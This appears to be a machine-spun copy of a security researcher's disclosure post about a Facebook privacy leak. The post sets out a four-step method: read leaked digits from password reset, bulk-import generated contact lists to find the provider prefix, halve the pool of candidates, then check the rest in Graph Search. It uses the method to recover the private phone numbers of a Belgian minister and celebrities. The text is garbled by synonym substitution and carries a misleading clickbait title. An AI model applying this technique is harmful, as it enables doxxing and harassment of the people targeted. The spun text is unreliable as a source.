How to Find Your Friends Phone Numbers On Facebook

Don't have the time to read the whole short article? Go to the FAQ area below for everything you should know, How To Find Your Friends Phone Numbers On Facebook.

Update: someone explained that PayPal really exposes the last 4 digits of the contact number, so this technique might work for big nations too if the target has its phone connected to its PayPal account.

How To Find Your Friends Phone Numbers On Facebook

Last month, I found it is reasonably basic to expose private telephone number on Facebook, uncovering some contact number of Belgian superstars and political leaders. Even though this technique only seems to operate in little countries such as Belgium (+/- 11.2 million individuals), a significant variety of people is impacted by this easy, yet effective privacy leak.

When I informed the great folks of the Facebook Security team with my concerns, I got a response I didn't rather expect:

When the "who can look me up by phone" setting is set to public, your contact number is public.

There are a few concerns with this:.

- The setting is set to public by default.
- It's confusing: even though your phone number on your profile is set to 'just me', the 'who can look me up'- setting overrules this. While people believe their contact number is personal, it's not:.

This setting only indicates whether the telephone number is visible on your profile. It does not show whether your telephone number is public.

If this setting is set to 'Everybody', which is the default worth, your telephone number is thought about public.

' Who can look me up' also indicates the individual 'looking you up' currently has your phone number. It suggests that someone if searching for your particular Facebook profile based upon your telephone number, and not the other way around.

- There is just no just me setting.

If you link your contact number to Facebook and want to lock down your privacy settings, you can not prevent your 'friends' will still have gain access to.
In spite of sharing my interest in the security group, they chose not to repair the problem. Despite the fact that I do not agree I appreciate their decision. I did decide the discuss it however-- I think people can understand.

- Lots of people do not even understand Facebook has their contact number. While Facebook can not just extract your phone number from your phone, it will consistently ask you to validate and conserve your number upon launching Facebook for mobile. After an associate deleted his telephone number following my findings, Facebook right away asked him to re-enter it:.

How it works.

My technique uses the graph search. Many people knows that you can go into a telephone number in the Graph Search to get the corresponding user:.

Merely checking every number is an impossible job that would take months. Facebook likewise has some strong rate restricting in place that will momentarily block extra requests after +/- 1000 lookups. Sure, you might utilize a botnet with legitimate Facebook accounts, but I'm sure Facebook has some constraints to deal with these, too.

STEP 1: The last 2 numbers (1 minute).

I needed to discover a method to evaluate thousands of telephone number simultaneously. The less telephone number I 'd have to test, the quicker I could get to the complete number. To get rid of the last two numbers, I utilized Facebook's password reset performance:.

Facebook exposes the last 2 digits of the minister our house affairs, an extremely ranked political leader.
STEP 2: The supplier number (5-- 35 minutes).
Here's a typical Belgian contact number, where X equates to any number from 0-- 9, and PP equates to the provider number. I already filled out the last two digits we got in the previous step.

( Less than 400,000 possible numbers).

Service provider numbers are connected to the mobile phone service provider:.

Some provider numbers are more commonly used than others. People working for the government more than likely have a 047 number, as Proximus is the state-sponsored supplier.

At this point, I wrote a program that would make a contact list with every possible number starting with, let's say, 0479:.

Then imported this list in the 'discover pals' functionality and inspected the suggested friends.

There were a number of "Jan"'s in the list, but my target was not. Do not mind the '500' number-- more contacts remained in imported.

No luck for 0478, either. I had to change accounts at this time because Facebook only allows 20,000 contacts to be imported in a brief timespan. I logged into another test account, attempted with 0477 got "3rd time lucky":.

So at this moment we can add the company number:.

We also have a list of 10,000 numbers of which one is the minister's number.

STEP 3: Limiting (10-- 15 minutes).
The tail end just consists of some basic math: we have 10,000 possible numbers left, so if we check half of those numbers we can limit our swimming pool to a handful of numbers, for instance:.

0477 0000 50-- 0477 5000 50.

The target was present in this variety, so this implies that the 5th number is either 0, 1, 2, 3 or 4. 5000 [0000-- 5000] possible numbers left.

Let's divide the 5000 numbers that are left by two once again.

Checking for 0477 0000 50-- 0477 2500 50:.

No luck with the 0000-- 2500 range, so we can be sure the phone number is in the 2500-- 5000 range. We got 2500 numbers left, divided the swimming pool in a half so we have 1250, 750, 325, 162, 81 and eventually 40 numbers left. We can continue to do experimental testing by spitting the swimming pool in a half to 20, 10 and 5 numbers, but with less than 50 numbers left you can likewise check all numbers individually in the chart search.

ACTION 4: The last countdown (1 minute).
With only 40 possible telephone number left, it is pretty simple to evaluate all the numbers that are still in the pool. Just enter them in the search bar until you struck the profile you were searching for.

I notified the minister about this privacy leakage. In a declaration he said he didn't know Facebook was leaking is telephone number, however he personally does not truly mind as long as there's no abuse.

In cooperation with a regional radio station we called another Belgian star on air to inform him about the fact that I discovered his phone number through Facebook. We had a good chat and he removed his telephone number from Facebook instantly later on.


- Exactly what's the issue?
In little nations phone numbers on Facebook are easily visible. Facebook argues that whenever the setting "who can look me op by contact number" is set to public (which is the default setting), your phone number is thought about public (even though it is not displayed on your profile). This is confusing and Facebook uses too little procedures to avoid this. Setting your telephone number completely to 'just me' is just not possible.

- Who is impacted?
Anybody in a little nation that (maybe unconsciously) added their contact number and did not alter the default setting. It is hard to give an exact list of affected countries, but if you have a 10-digit phone number and the list of provider numbers (first two) is rather restricted, it needs to work.

- How can I test whether Facebook knows my phone number?
Go to All recognized contact number should be noted there.

- How can I evaluate whether I'm affected?
( Only if you live in a nation with a rather little population, like Belgium):.
Check whether Facebook understands your phone number (question above).
Go to and examine the setting "Who can look you up using the telephone number you supplied". If it's set to "Public", anyone could retrieve your telephone number if conditions above are met. If it's set to "Pals", just your buddies can. Note that there's no "Only me" setting.

- How does it work?
The procedure consists of 4 steps and needs a program that has the ability to generate a specific variety of contact number.
1. Getting the last two numbers utilizing password reset (takes 2 minutes).
2. Getting the provider number (if any, depends on luck, takes 15-- 35 minutes for a Belgian telephone number) by creating a list of possible numbers and importing them though the 'discover good friends'- functionality.
3. Limiting the swimming pool by splitting it in half and trial and error (15-- 20 minutes).
4. Evaluating the numbers left (40) manually in the Graph search (2 minutes).
It is difficult to anticipate for how long it requires to discover a telephone number as it depends on the amount of possible telephone number, requirements (test accounts, phone number generator) and some luck, nevertheless I think it's safe to say that in my screenings it took only30 minutes to 60 minutes to crack most numbers.

- Exactly what can (or should) Facebook do about this?
Everything boils down to notifying individuals. The most significant problem with this is that the majority of individuals don't understand about this as it is the default behaviour. Things would be different if the 'who can look me up' feature is set to 'just me' (which does not exists, yet), in the very first location. Facebook might also conceal the two numbers that are exposed in a password reset request whenever the user does not regularly log in from that specific computer. They might also limit the amount of 'friends' you can import additional (I do not see why anyone would import 10.000 numbers at the same time).

- I'm impacted. Should I eliminate my contact number?
That's a tough question, due to the fact that telephone number offer an excellent type of two-factor authentication which is a suggested privacy safeguard. You can still limit your 'who can look me up'- setting to 'only buddies'.

- I don't care my contact number is public.
Great for you. I personally do not mind either-- but I'm rather sure others do. Many politicians and Belgian celebs I called about this issue were thankful I made them familiar with this and eliminated their phone number right now.
Caring whether your telephone number is public or not, it doesn't really matter. To me, a more concerning part is that users seem to be misinformed by unclear personal privacy settings. If you set your phone number to 'only me' it shouldn't be overruled by some other default setting. It proves that despite its efforts, Facebook still deals with some tough difficulties worrying personal privacy and functionality.

- Timeline.
> Jan, 9th-- Me: Preliminary report to Facebook.
< Jan, 9th-- Facebook: Automated reply. > Jan, 9th-- Me: Some extra information.
< Jan, 9th-- Facebook: "No concrete security or privacy effect.". > Jan, 9th-- Me: Are you sure? Additional information.
< Jan, 10th-- Facebook: Yes. > Jan, 12th-- Me: Thanks-- I do not concur but I respect the choice. (1/2).
> Jan, 12th-- Me: Ask if I can blog about it in February (2/2).
< Jan, 12th-- Facebook: further information (see the screenshot above).

- Are you mad at Facebook?
Not at all. Facebook has among the very best bug bounty programs and security groups offered to hackers. I appreciate their choice however I also believe it's our right to be notified of the design choices which might impact our personal privacy.

- I found a vulnerability in Facebook. Where do I start?
Cool! Make sure you read their Bug Bounty Rules and are reporting a legitimate bug. After reporting the issue here, they may choose to honor you in their Hall of Popularity and reward you with a bounty starting at $500 USD.

- Who are you?
I'm Inti and I reside in Oilsjt, Belgium-- the nation known for its beer, french fries, chocolate and terrorists. As a kid, I was incredibly proficient at breaking stuff. I'm 21 now, student, and still doing basically the same being an ethical hacker with references as Google, Facebook, Microsoft, Yahoo and so on. I don't truly consider this as a 'hack' or a 'vulnerability' however-- more like a privacy issue people should understand about.

- Other jobs?
I recently pirated a Trump tweet, made that highlights the scary side of the Facebook graph search and wrote a comparable blogpost prior to that eventually got Facebook to repair the addressed issue.

Such articles How To Find Your Friends Phone Numbers On Facebook thanks for visiting can hopefully help you out.